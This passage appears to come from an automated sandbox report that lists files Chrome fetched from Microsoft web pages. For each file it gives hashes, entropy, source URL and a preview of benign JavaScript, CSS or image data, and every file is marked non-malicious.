                                                                                                                      Preview:var WcpConsent;!function(){var e={229:function(e){window,e.exports=function(e){var t={};function o(n){if(t[n])return t[n].exports;var r=t[n]={i:n,l:!1,exports:{}};return e[n].call(r.exports,r,r.exports,o),r.l=!0,r.exports}return o.m=e,o.c=t,o.d=function(e,t,n){o.o(e,t)||Object.defineProperty(e,t,{enumerable:!0,get:n})},o.r=function(e){"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(e,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(e,"__esModule",{value:!0})},o.t=function(e,t){if(1&t&&(e=o(e)),8&t)return e;if(4&t&&"object"==typeof e&&e&&e.__esModule)return e;var n=Object.create(null);if(o.r(n),Object.defineProperty(n,"default",{enumerable:!0,value:e}),2&t&&"string"!=typeof e)for(var r in e)o.d(n,r,function(t){return e[t]}.bind(null,r));return n},o.n=function(e){var t=e&&e.__esModule?function(){return e.default}:function(){return e};return o.d(t,"a",t),t},o.o=function(e,t){return Object.prototype.hasOwnProperty.call(e,t)},o.p="",o(o.s=3)}([function(e,t,o)
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:PNG image data, 594 x 332, 8-bit/color RGBA, non-interlaced
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):26647
                                                                                                                      Entropy (8bit):7.961164465196959
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:384:nhL1z7tVW03Npmi6K0i1WRphEQAjQLj9I32JxMqJn26OsNCVbgP6re0QG9d8b1P:h1zXWKYi90i+Az3cxMqV26pNAeTG9do
                                                                                                                      MD5:7343B003F48E30FBDDF87CFC795E860A
                                                                                                                      SHA1:12FF2D14D7666F516CAF23848113902A7D5570C6
                                                                                                                      SHA-256:B8B3DBA0B8C52DB7CCBFAD56815F0F38E83895488101C51AA580AD581D7115CC
                                                                                                                      SHA-512:39E291A9E69D1D22B414428148EA7795FF1D33F875BF823F0E8C96276431E7AAE5A1B4EF7F050492B9903214B5FE7B9B4C92FF1B68A03A614258BA04605640C5
                                                                                                                      Malicious:false
                                                                                                                      URL:https://support.content.office.net/en-us/media/bcd2fdf1-530a-482f-b96d-5f2f2a49ac66.png
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):21727
                                                                                                                      Entropy (8bit):5.232101618468897
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:384:xYzlQeau9P3TI8NCUiLFv1uP4ZVSc2uQyea+eHbJjaTbz7NiCR6Rv98NOsQzOiL/:xYhQel3TI2ChBt2OVSZuQoJjG7N1R6Rp
                                                                                                                      MD5:C49C34EE38F103BCB82F58DED32F57DB
                                                                                                                      SHA1:757C8CE6D92102903F636C20B70E414A5E9A2E20
                                                                                                                      SHA-256:BDBBDA3BD97031FF5BCB76B427D2ECD9C4617922C3860F662E51FB18AC5CC591
                                                                                                                      SHA-512:5C5307784F8B7D3CF479154CADF3525D1D1BF05216D72BB32ABEF6E25183E26FB4D84DB7B14AA2868B11F54E23284D02BFE0309EE4D560AC79A507F762DBC219
                                                                                                                      Malicious:false
                                                                                                                      Preview:/*! Copyright (C) Microsoft. All rights reserved. */....(function ($) {...'use strict';...(function smartFeedback() {....var activatedStarRatingValue = null;....var activatedStarRatingLabel = null;....var userSelectionIsInfoHelpful = null;......var checkBoxSelected = false;....var starRatingSelected = false;....var verbatimEntered = false;....var $spanDisplayElementsForStarCheckbox = $(".translationRatingStar, .checkboxTick");....var $extendedFeedbackStarCheckboxElements = $(".translationRatingStar, .articleExperienceOptionsCheckbox");......var $extendedFeedback = $("#extendedFeedback");....var $extendedFeedbackForm = $("#extendedFeedbackForm");....var $feedbackWrapper = $('#supWrapperToPreventFeedbackFlickering');....var $starRatingDescription = $("#starRatingDescription");....var $supDisableStickyFeedbackButton = $("#supDisableStickyFeedbackButton");....var isEnableStarRating = $feedbackWrapper.data("enableStarRating") ? $feedbackWrapper.data("enableStarRating").toLowerCase() === "tr
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text, with very long lines (65394)
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):91802
                                                                                                                      Entropy (8bit):5.3603423050848615
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:1536:C4F18VDgLMcb+0XbPN1xlJGFqCN3tcULcUoHfe:C4F18VDgLN9LN1mTn
                                                                                                                      MD5:CF5CC7F4B57526CC37893DCB83DED031
                                                                                                                      SHA1:E953783BE0A7894585778455AAE3D0DF094D6F29
                                                                                                                      SHA-256:3A790B6C0D26D7A4D292CB27F992EAFAFF42C37E9318B2AB704207039127FCB8
                                                                                                                      SHA-512:2320F9D7811CD773C1E5C2E95A31B39E9FF62A2FA7CA431975873DAB57AE42A75BA720D15AEB47FA2EA127D0766EB5AA15040CFFD04BF7A8CB8BCD7236069C40
                                                                                                                      Malicious:false
                                                                                                                      Preview:/*!. * 1DS JS SDK Shared Analytics, 3.2.18. * Copyright (c) Microsoft and contributors. All rights reserved.. * (Microsoft Internal Only). */.!function(e,n){var t,r={},i="__ms$mod__",o={},a=o.esm_ms_shared_analytics_mectrl_3_2_18={},u="3.2.18",c="oneDsMeControl3",s=(s=e)[c]=s[c]||{},l=(l=e)[c="oneDsMeControl"]=l[c]||{},e=s[i]=s[i]||{},f=e.v=e.v||[],c=l[i]=l[i]||{},d=c.v=c.v||[];for(t in(c.o=c.o||[]).push(o),n(r),r)s[t]=r[t],f[t]=u,l[t]=r[t],d[t]=u,(a.n=a.n||[]).push(t)}(this,function(e){"use strict";!function(e,n,t){var r=Object.defineProperty;if(r)try{return r(e,n,t)}catch(i){}typeof t.value!==undefined&&(e[n]=t.value)}(e,"__esModule",{value:!0});var y="function",m="object",se="undefined",C="prototype",I="hasOwnProperty",b=Object,S=b[C],x=b.assign,w=b.create,n=b.defineProperty,_=S[I],T=null;function O(e){e=!1===(e=void 0===e||e)?null:T;return e||((e=(e=(e=typeof globalThis!==se?globalThis:e)||typeof self===se?e:self)||typeof window===se?e:window)||typeof global===se||(e=global),T=e),e
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text, with very long lines (601)
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):10434
                                                                                                                      Entropy (8bit):5.138897195822734
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:192:ucdsngdKadwed0XdLIdLdOgdOudq/m0YdOK/KadqMdrudq/B2nded8vd7dtkkYdd:Nsg31oLYBlxq/bIH/Kyq8yq/B2d2YRtm
                                                                                                                      MD5:E5E717DDD1C394CD4371209C7CD8BD28
                                                                                                                      SHA1:B1B35E8AAEB2AA8E3A6F622DEF626AEF871A3BB3
                                                                                                                      SHA-256:8511F1B20AB4F34B58C0D65507297CE00B07F341E5CFC31E38169230FA295BF6
                                                                                                                      SHA-512:8DD6C2E6432FB0717F4472C6A8BA1B6B6F26C2B35F876DE2F9136F36FCA27DC05A9DC9FE5E912335F83A02BED765EE2BAAF3EAD87CD0B4A8A4204C8D75663325
                                                                                                                      Malicious:false
                                                                                                                      URL:https://www.microsoft.com/etc.clientlibs/mlsd/components/content/Inpagenavigation/v1/Inpagenavigation/clientlibs/sites.min.ACSHASHe5e717ddd1c394cd4371209c7cd8bd28.js
                                                                                                                      Preview:'use strict';function calcNavItemWidth(){var d=0,c=$("#stickyNavDesktop .more").outerWidth(!0);$("#stickyNavDesktop \x3e ul \x3e li:not(.more)").each(function(){d+=$(this).outerWidth(!0)});c=$("#stickyNavDesktop").width()-c;var f=$(".custom-sticky-nav").hasClass("windows-scroll-effect")?90:45;0!=d&&d/c*100>f?(c=$("#stickyNavDesktop \x3e ul \x3e li:not(.more)").last(),c.attr("data-width",c.outerWidth(!0)),c.prependTo($("#stickyNavDesktop .more ul#submenu")),calcNavItemWidth()):(f=$("#stickyNavDesktop li.more ul#submenu li").first(),.d+f.data("width")<c&&f.insertBefore($("#stickyNavDesktop .more")));0<$(".more li").length?$(".more").removeClass("d-none"):$(".more").addClass("d-none")}.function checkIfMoreHasOptions(){setTimeout(function(){$(".custom-sticky-nav .more li:not('.navitem-right-mobile')").hasClass("active")?($(".more .more-options-link").addClass("active-more"),$(".nav-right-items ul li").removeClass("active")):($(".more more-options-link").removeClass("active-more"),$(".nav-r
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text, with very long lines (3637)
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):3690
                                                                                                                      Entropy (8bit):5.141541571595828
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:96:Af3vI6YmI62HUbHbZbpVuJRDhxwC9jTx+IRcaOs/Z:Af3vI6YmI62HUrllgffOQZ
                                                                                                                      MD5:A249B03B72AB5E7B60E7806457B9BE61
                                                                                                                      SHA1:FF0B5F4FB91A9DBF147262AD59B292C6C2DFE122
                                                                                                                      SHA-256:48FF8C6449BEF199F206C7A1C49403E10DC6341A9D4A1F8946B042DDE66E315F
                                                                                                                      SHA-512:29F204E3813972DC76FCE3DD6715093646EB0DA52DEDAC5E7E09B618E5CF8703CDE95D463727EB29F90D461D0C5A73B5701EC39B994A268103A06306144A6F34
                                                                                                                      Malicious:false
                                                                                                                      Preview:!function(){"use strict";var n;!function(n){n.PromotionBanner=".PromotionBanner",n.TopPageBanner=".TopPageBanner",n.AboveUhfBanner=".AboveUhfBanner",n.RailBanner=".RailBanner",n.NpsRailBanner=".NpsRailBanner",n.RailSecondaryCtaBanner=".RailSecondaryCtaBanner"}(n||(n={}));var e=[{dismissSelector:null,clickSelector:"#ucsTopBannerButtonLink",element:n.PromotionBanner},{dismissSelector:"#top-banner-dismiss-button",clickSelector:"#ucsTopBannerButtonLink",element:n.TopPageBanner},{dismissSelector:"#uhf-banner-close",clickSelector:"#upgradeUhfBannerButton",element:n.AboveUhfBanner},{dismissSelector:"#rail-banner-dismiss-button",clickSelector:"#rail-banner-button",element:n.RailBanner},{dismissSelector:"#nps-rail-close",clickSelector:"#nps-rail-link",element:n.NpsRailBanner},{dismissSelector:"#rail-banner-dismiss-button",clickSelector:"#rail-banner-button, #rail-banner-button-secondary",element:n.RailSecondaryCtaBanner}],t=function(){return t=Object.assign||function(n){for(var e,t=1,r=argument
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text, with very long lines (584)
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):6798
                                                                                                                      Entropy (8bit):5.383941368080596
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:192:2+ocdo4VYgB9G/0y/qhNJ5k4iflBDHndCjOGGWr:2+ocdo4B7G/0yyNSflhndCjOGGA
                                                                                                                      MD5:1DABD5CC3F7B68C178B59EA74DC62947
                                                                                                                      SHA1:B8DF9D8FD267B8B74325667DC97278CCC90A1464
                                                                                                                      SHA-256:E49EFB0A75AF4995902362EA679A0FC4EB120A881A090CB8424D5CBD183436A2
                                                                                                                      SHA-512:8C26E45CA37AC5DCCCC0C7BBCA92E0E8E11FB807A6D9A6916D5A0CC1CF198A7942DD5583C31ACBD1A11DDE004C252806D205E9CFDA7F494A6F7D5BBFA42920E4
                                                                                                                      Malicious:false
                                                                                                                      URL:https://www.microsoft.com/etc.clientlibs/microsoft/components/content/universalheader/v1/universalheader/clientlibs/site.min.ACSHASH1dabd5cc3f7b68c178b59ea74dc62947.js
                                                                                                                      Preview:'use strict';(()=>{function m(f){var e=G[f];if(void 0!==e)return e.exports;e=G[f]={exports:{}};return I[f](e,e.exports,m),e.exports}var I={1623:()=>{$(function(){function f(){-1!==document.cookie.indexOf("".concat("Cascade.AuthSSO","\x3d"))&&(document.cookie="".concat("Cascade.AuthSSO","\x3d; expires\x3dThu, 01 Jan 1970 00:00:00 UTC;"))}function e(){var a=function(){var d=document.cookie.match(/(^|;\s*)(Cascade.AuthSSO)=([^;]*)/);return d?(d=parseInt(decodeURIComponent(d[3])),!isNaN(d)&&d>n.DefaultAttempted?.n.SharedStateAttempted:n.DefaultAttempted):n.NotAttempted}(),c=!(!window.msauthRpsShare||b.accountConstraint===w.AAD);if(a===n.NotAttempted||c&&a!==n.SharedStateAttempted)!function(d){$("#".concat("cascadeauthsso")).remove();var g=document.createElement("iframe");g.src=d;g.setAttribute("width","0");g.setAttribute("height","0");g.setAttribute("border","0");g.setAttribute("frameborder","0");g.setAttribute("style","display: none");g.id="cascadeauthsso";document.body.appendChild(g)}(""
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:PNG image data, 297 x 166, 8-bit/color RGBA, non-interlaced
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):6270
                                                                                                                      Entropy (8bit):7.945330124411617
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:192:zS7+uH6tmhCSqN0K4Wykh3YMBYpAjav+tlXQ:m7vHqS9WyiooqSa2m
                                                                                                                      MD5:5C04A186E00E47C2F90ED18E03AB4093
                                                                                                                      SHA1:AC859795B92E3FA0FA88868AF532A3ED6F30F12A
                                                                                                                      SHA-256:1A16DBCD6926721D9C3AEB85429586B307F11D2093CF9AEEFDAA37898CB74D46
                                                                                                                      SHA-512:909830B01A21E61D98ADF1C61DFC44BD414CF03C51250A9DD7B5C26FB12D6334D984A21F25B5ED089FFDED4CAAA764579EEA317470C8616B7928E989B1A1778A
                                                                                                                      Malicious:false
                                                                                                                      URL:https://support.content.office.net/en-us/media/f4e85874-2a1a-438d-9c3c-17b069c454c0.png
                                                                                                                      Preview:.PNG........IHDR...)...........y;....pHYs.................sRGB.........gAMA......a.....IDATx...._S...SE4....&..DE0(.e.&jb...h....C..b,.i.na.2pI.P"H.!. ZB....w.~..g_._..$'.....>...k..p.....z............:.x...l...:.g.u.......Fz..I..Sh.......T..L)}.c..e.T1.........OL..T,\N\..K4.57.......{./.yR.H.JlQ......@..b...TAT.....)6.0-."... .&..:K.d]1L...R..lJ.......:.....9.|?}..........g..K..._.R....bk.i..E..K.%`...O....i..E.U....J.L.v.|..a........bV.jY.>3...M.$R......T.J.....(:......z..L..E5".w.wl.w.g.A1..E.|.......[*a...g..T.....J...U.z..|.l)..8..U..kp.cR........T...1..l.n|.i....5..*.k.j...q.F.}.E/#.j...D....T....3'..^.^:.4.Z....K.`..c@9.Y.=S.W..t..=&.Z.G.R-....%f..xG...".../l.....[.WTw/er#..I.....L.>..R\.........!..U. .5...C.ol.0%....=.....L..B..L..9.&..c.O%T|..h........egj?A......&...-*.X......;p...nf....T.....,bea.bj#.%....1..0L(Q.... ..sL..P...E.cX%.e...v.SQ".njw...:.>...\.%...b[T..cn'.#Z..i...C..%CX."....ej<.Q.LB......u.(.....E.?.'sR...DN
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text, with very long lines (1290)
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):11629
                                                                                                                      Entropy (8bit):5.449562181288923
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:192:D+BJaYpdowNJ0EwWnvUaBBVaJxQvqKTAphPgffazesLZEU1bsLM7vImzwXdrQ9Cr:D+DDdowNJ0EwWnvUaBBVaJxQvqKTAphS
                                                                                                                      MD5:BB93CF674BEB54673814249DCF4EFC96
                                                                                                                      SHA1:3190F4BE4D37525C6B3222B93EEAFBC66B538E94
                                                                                                                      SHA-256:9653EB19E7206B44513D92E4C9359B289FC2478D4611AE01C5798C89C8211E70
                                                                                                                      SHA-512:D7E09140CF399BDEB513544617FABD95AB62BE0D9DD265B2A9E5EB5D1DC29497FE5A4088E66A00C4AEBB9529A217354EBEF512E504B22245CF8C12DC3D95B449
                                                                                                                      Malicious:false
                                                                                                                      URL:https://www.microsoft.com/etc.clientlibs/mlsd/clientlibs/clientlib-windows.min.ACSHASHbb93cf674beb54673814249dcf4efc96.js
                                                                                                                      Preview:'use strict';var currentLocale=$("html").attr("lang").toLowerCase(),currentPage=window.location.pathname.toLowerCase(),targetPage="/en-us/windows/business/windows-11-pro",enableExperiments=document.querySelector("meta[name*\x3d'enabled-experiment']"),enableExperimentsValue=void 0!=enableExperiments&&null!=enableExperiments?enableExperiments.content:"",DB_AUDIENCES="Software \x26 Technology;Business Services;Telecommunications;University;Financial Services;Manufacturing;Education;Construction;Healthcare \x26 Medical;K12".split(";"),.win_personalization={"en-us":{alt:{"Software \x26 Technology":"A man working at a standing desk surrounded by three monitors with coding information on screens.","Business Services":"A conference room with Microsoft Teams on monitor and several people around a table with laptop open, working on schematic.",Telecommunications:"A single telecommunications tower rising amongst a sunset and mountains.",University:"Several college-age students with laptops open,
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text, with very long lines (7862)
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):129677
                                                                                                                      Entropy (8bit):5.330029900554168
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:3072:BkDsmoyraxaOfNPN5/4OYQk9qNeUyMLBRMr:BkZX2xaw8
                                                                                                                      MD5:10908F1C465EEADC74B1C17C9515EB8A
                                                                                                                      SHA1:EAB69087F1E08128C3B08CE3AFB6E5980CBF058D
                                                                                                                      SHA-256:51F1F59783B1C7C3C9F4C892F629C6A9F801ECCFC2CEA0B1D6AB5A1DC685DD03
                                                                                                                      SHA-512:55CF4EFB3D2314CF1ECE48E9A146A40B6A884C66027FD19BDDC2BBCBCCBAAA0C07DF6AE7937DC1DD8783257B515ABF0B2CF84F2E0CDA4236FA92ED01A54FDDD1
                                                                                                                      Malicious:false
                                                                                                                      URL:https://www.microsoft.com/etc.clientlibs/cascade.component.authoring/clientlibs/clientlib-base.min.ACSHASH10908f1c465eeadc74b1c17c9515eb8a.js
                                                                                                                      Preview:/*******************************************************************************. * Copyright 2017 Adobe. *. * Licensed under the Apache License, Version 2.0 (the "License");. * you may not use this file except in compliance with the License.. * You may obtain a copy of the License at. *. * http://www.apache.org/licenses/LICENSE-2.0. *. * Unless required by applicable law or agreed to in writing, software. * distributed under the License is distributed on an "AS IS" BASIS,. * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.. * See the License for the specific language governing permissions and. * limitations under the License.. ******************************************************************************/.if (window.Element && !Element.prototype.closest) {. // eslint valid-jsdoc: "off". Element.prototype.closest =. function(s) {. "use strict";. var matches = (this.document || this.ownerDocument).querySelectorAll(s);.
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (65513), with no line terminators
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):100179
                                                                                                                      Entropy (8bit):5.2435712713226845
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:768:2qnFfbkxlWF8tdYRZMcPEk5BFIsbyy9ojybRpWJIYpQ58WLJY8wE2usUrGBux+dZ:k3WdZ0oQZ2LvEV5jNWxb95e
                                                                                                                      MD5:33BF947D1178156F1D7E83A0FBCF358F
                                                                                                                      SHA1:CF6D6E22E199A2C7365E094B7EC217E8CF8949B3
                                                                                                                      SHA-256:0B042AEAB7553F44AE03FFCC375E4AC4AC330F18EF633A52B7107BFE0DFA6BC9
                                                                                                                      SHA-512:87EAC2083EAF95D1CB17B52D32B27E25FC386C639630A5D9AE266BCB9E2AE3CDF1B192924BBDF822F2F661626F835449C97377CCD3A07AB8182AED7B4E6D2523
                                                                                                                      Malicious:false
                                                                                                                      URL:https://support.microsoft.com/css/Article/article.css?v=CwQq6rdVP0SuA__MN15KxKwzDxjvYzpStxB7_g36a8k
                                                                                                                      Preview:.html[dir=rtl] .supHomeAndLandingPageSearchButton{right:auto;left:0}html[dir=rtl] .supHomeAndLandingPageSearchBox{padding:0 18px 0 50px}.supHomeAndLandingPageSearchBoxForm{margin:auto;position:relative;max-width:748px}.supHomeAndLandingPageSearchBoxForm .supSuggestionList{margin:0;padding:0;list-style:none}.supHomeAndLandingPageSearchBoxForm .supAutoSuggestContainer{width:100%}.supHomeAndLandingPageSearchBoxForm .supSuggestionItem{text-indent:0;padding-left:18px}.supHomeAndLandingPageSearchBoxContainer{position:relative}.supHomeAndLandingPageSearchBox{width:100%;height:51px;font-size:1rem;padding:0 50px 0 18px;border:1px solid #a9a9a9;outline:0;font-family:"Segoe UI","Segoe UI Web","wf_segoe-ui_normal","Helvetica Neue","BBAlpha Sans","S60 Sans",Arial,sans-serif}.supHomeAndLandingPageSearchBox::-webkit-input-placeholder,.supHomeAndLandingPageSearchBox:-ms-input-placeholder,.supHomeAndLandingPageSearchBox::-moz-placeholder,.supHomeAndLandingPageSearchBox::-moz-placeholder{color:#505050
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 142367
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):49911
                                                                                                                      Entropy (8bit):7.994516776763163
                                                                                                                      Encrypted:true
                                                                                                                      SSDEEP:1536:vr2T/J/l2R6ACJVMQPYmlBXTm12g9bcKo0y0ci:CzJ/lG2KQzBjm1b3ci
                                                                                                                      MD5:9B96CC09F9E89D0334BA2FBC22B5197A
                                                                                                                      SHA1:B5FE69F39E9F61FEF88DF794F02DC4F4086E2592
                                                                                                                      SHA-256:E6331018533143C411BAE25326AB52FCED541C48674551AEA78E750855BDCD1D
                                                                                                                      SHA-512:2BDD71A34A7D6172AD4B7B6CF077A891D6266C148000EEF8345E2343E6C21ED8783B2EA328EF3BF7176462A3CA575D2D6D4B55A07138CFD1B02900C95F61077D
                                                                                                                      Malicious:false
                                                                                                                      URL:https://aadcdn.msauth.net/shared/1.0/content/js/BssoInterrupt_Core_zKox_QMcTIVut7mG_Z9Eew2.js
                                                                                                                      Preview:...........m[.8.0........OL....;w.....a.....\N.......h.r~........=........,..JU.......T~.l..?..y..2.X9.|xvP9...TN.......?.....qe.OE.~Gn,.J.T....0......r..#.V&Qx_I.De.._.8.+S?N..HL..J......%O..S........(=.gO.|.T.0......6.. ..y....x..*..8..p.T"1...|$.Cz..V.D%.Ie.F....^."..5....c...?..T8..._..b.gs.4....S]kDZ..7.J.V..l}..?.....c...g.A...8.......8.VB..*....^..f..O.*... ...`...H.{.$. OP..S..AC.gVE.I8..).-U.....R...A..%.T[...Fc{..49..If...y.'w.Q}..oz..v.....W...pp..%..G.+.r:.A.*.....[.:..s.?U......_............k.y0.U....+I5..0.>.Q%.".w.....O....5w..;.;.>..mr.k53r.......k.0.I.<.D......d&...c..jhE..zx.]....y|W....i...`.. .k.P...@.Uq.\;..1............z|.O..Y5..........XtR,....R...k3..<.*.\.2.>.;T..$...kj.5-.i?/..YH`!jb..Z..=.&.L..F...([..y....K5pzQ.>i.1.......0..P...@...L.".n.x..Cj?..w.:+...n..4..H.. .*....S.....h*....8....v.l.[M.0..q..c;.....0*..*.8.......l.TM..n "..km..S.<.T..].k.+1.....P.V...4-W.C....0-/.S;.w......K.z+...DZ....=q.E.@ .Dv.z...@.d.#tE...
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text, with very long lines (442)
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):4206
                                                                                                                      Entropy (8bit):5.149477471473544
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:96:bV8irqJfqdqD7c1QkE5vYLXWOXblopFB5nj6Fcw:huYvE1YCOWrB6D
                                                                                                                      MD5:7E4C571D7EEBB658AE1F491FB0F54362
                                                                                                                      SHA1:934C3B0A597A0559EB7B8470C066F68CD916210A
                                                                                                                      SHA-256:3295588A9D0267946056C879C46878AA357C4EE45AA2459F3D278905062B9655
                                                                                                                      SHA-512:5C067C563B7C00D2081691F28EA33DFA7BF7A3B48E6F1239B58261C0B5BD8E3917CA881E3E68717D93D521F140C4F5CE24322A23ED236FCA3B2F6BB4F9194BF4
                                                                                                                      Malicious:false
                                                                                                                      URL:https://www.microsoft.com/etc.clientlibs/mlsd/clientlibs/clientlib-site.min.ACSHASH7e4c571d7eebb658ae1f491fb0f54362.css
                                                                                                                      Preview:.MLSD .border-radius-8px{border-radius:8px}..MLSD .border-radius-4px{border-radius:4px}..MLSD .border-radius-img img{border-radius:8px}..MLSD .mlsd-articles-2col-r.col-md-4 .content-card .row.row-cols-1.row-cols-md-2 .col{flex:0 0 100%;max-width:100%;padding-bottom:3rem}..MLSD .cards-without-image .card-group>.card{padding:7rem 2em}..MLSD .container .sticky-tabs .container{width:100%;padding:0}..MLSD .col-md-8 .richtext ol li,.MLSD .col-md-8 .richtext ul li{padding-bottom:10px}.#uhf-footer.c-uhff{margin-top:0}..MLSD .mlsd-compare-chart .compare-chart{overflow-x:hidden !important}..font-w-normal{font-weight:normal !important}..font-w-600{font-weight:600 !important}..font-w-900{font-weight:900 !important}..color-light-for-mobile .card-body,.color-light-for-mobile .card-body a{color:#fff !important}..color-dark-for-mobile .card-body,.color-dark-for-mobile .card-body a{color:#000 !important}..color-grey-for-mobile .card-body,.color-grey-for-mobile .card-body a{color:#808080 !important}.@me
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text, with very long lines (4873), with no line terminators
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):4873
                                                                                                                      Entropy (8bit):5.2268236765669895
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:96:p6+5cDrFRe+/zH/pMWtPfHGHPiBwXA4nHjnwwX8ntj29X8nvDMwtKcDneTbZoDy:k+5cDrFQO7pMWtPfmHPiBwXznHjnwwXp
                                                                                                                      MD5:ED927CF0F8A1BE103DF48446270416EE
                                                                                                                      SHA1:F7B2BE7FC2B063AAC03E76DF9F3E19D615970213
                                                                                                                      SHA-256:EBDD298DFD39A35E5F54469F12953081A17CBEA55F3A4A79C0FD4997D804F7D5
                                                                                                                      SHA-512:FCA692C8C7B104FB00C2E6D90C1A0D52A0FF93CDA626338D8FA114A0E9DCE2504DF9282868F98A46648A6E616A96ACD14CAD0460D72477421C8F5EE8F7D34256
                                                                                                                      Malicious:false
                                                                                                                      URL:https://support.microsoft.com/css/MeControlCallout/teaching-callout.css?v=690pjf05o15fVEafEpUwgaF8vqVfOkp5wP1Jl9gE99U
                                                                                                                      Preview:.teachingCalloutPopover{position:absolute;z-index:10000;top:45px;width:336px;right:2vw;color:#000;background-color:#fff;border:1px solid #000;box-sizing:content-box}.teachingCalloutPopover .caretArrow{position:absolute;display:block;width:1rem;height:.5rem;margin:0 .3rem}.teachingCalloutPopover .caretArrow::before{position:absolute;display:block;content:"";border-color:transparent;border-style:solid}.teachingCalloutPopover .caretArrow::after{position:absolute;display:block;content:"";border-color:transparent;border-style:solid}.teachingCalloutPopover .caretArrowPosition{left:215px}.teachingCalloutPopover .win-icon{font-family:"Dev Center MDL2 Assets";font-style:normal;font-weight:normal;line-height:1;position:relative;top:1px;display:inline-block;vertical-align:baseline;-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale}#teachingCalloutDismiss,#teachingCalloutMessages{color:#000}.teachingCalloutHidden{visibility:hidden}.calloutMessageHidden{display:none}.caretArrowUp{
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text, with very long lines (65460)
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):566897
                                                                                                                      Entropy (8bit):5.427009136389396
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:6144:XU3oul3BmWRE2cXXB6l4QK/AAcRDsEbXiTMTyMm6KfjzVV/2GrKJB:XQY22kuQ4PJV/2GrKJB
                                                                                                                      MD5:C0BB28600CF931A17482376C5E27CABE
                                                                                                                      SHA1:3C9B65F94334C9312F168AC51D2067D07DB3A619
                                                                                                                      SHA-256:70EB3BBB025DC4C9CB7F7297EF68B928E4A7D9F77F8B60BD4DE6C526CF195464
                                                                                                                      SHA-512:5957C114E0A04A949C6B8D8C104F62D810079DA249B87C8E5D3183AD7E57A4B2657C9C7BE8C87FC990754FFD8B30BEC8719A1279AB7B6ECEB114D12690007268
                                                                                                                      Malicious:false
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:Unicode text, UTF-8 text, with very long lines (45900)
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):45963
                                                                                                                      Entropy (8bit):5.396725281317118
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:768:H/eCtKv79zpXXfoJLjtK8Dx1DieS3i8eqUvdX:W/vXQJJDD27W
                                                                                                                      MD5:F00CFBA8F9859DFEFDFE90EA520C6FCF
                                                                                                                      SHA1:B32E153588A287DE81050E327EB5BD7A90B04D99
                                                                                                                      SHA-256:977CC9882BA50763333DF64E98D26BC3C60A15D6EFA4A2C1FE70579985EDDF84
                                                                                                                      SHA-512:DA51FAB6D6A6B05A1730FB97656A496870FE1248616BC3F9DDBE101D1C189B6BEC7CAF63976418F88843AFA64763D25542787116FFE0E43E35BF3DCE61914DAB
                                                                                                                      Malicious:false
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text, with very long lines (367), with no line terminators
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):367
                                                                                                                      Entropy (8bit):4.9898089353102595
                                                                                                                      Encrypted:false
